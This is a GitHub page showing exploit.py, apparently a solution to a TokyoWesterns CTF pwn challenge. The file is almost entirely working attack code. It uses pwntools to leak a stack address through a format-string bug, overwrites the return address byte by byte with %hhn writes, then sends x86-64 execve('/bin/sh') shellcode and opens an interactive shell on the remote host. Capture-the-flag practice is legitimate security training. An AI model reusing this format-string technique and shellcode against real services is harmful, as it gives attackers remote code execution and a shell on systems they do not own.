-
Notifications
You must be signed in to change notification settings - Fork 263
/
Copy pathexploit.py
66 lines (43 loc) · 1.15 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#this was just ordinary format string attack
from pwn import *
import re
r = remote("pwn02.chal.ctf.westerns.tokyo", 18247)
print (r.recvuntil("> "))
r.send("%p")
d = r.recvuntil("> ")
stack = re.findall(r'(0x[0-9a-f]+)',str(d))[0]
print (stack)
#gdb.attach("nothing",gdbscript="b *0x00000000004007c3\nc")
#input(".")
ret = int(stack,16) + 264
print (f"ret = {ret:x}")
#ret = 0x1111111111111111
payloadend = b""
for i in range(0,8):
payloadend+=p64(ret+i)
buf = ret-264
sofar=0
write=buf+1
payload = b""
#%x$hhn are put at the beginning of the payload, addresses are pu in the end of payload, "a" is between.
for i in range(0,8):
w = write & 0xFF
write = write // 0x100
if w>sofar:
p = w - sofar
if p<8:
p=p+0x100
else:
p = w + 0x100 - sofar
payload += str.encode(("%"+str(p)+"x"+"%"+str(30+i)+"$hhn"))
sofar+=p
sofar%=0x100
payload=payload+str.encode("a"*(0x100-len(payload)-len(payloadend)))+payloadend
print (len(payload))
r.write(payload)
d = r.recvuntil("> ")
print ("---")
print (d)
shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
r.write("q"+shellcode)
r.interactive()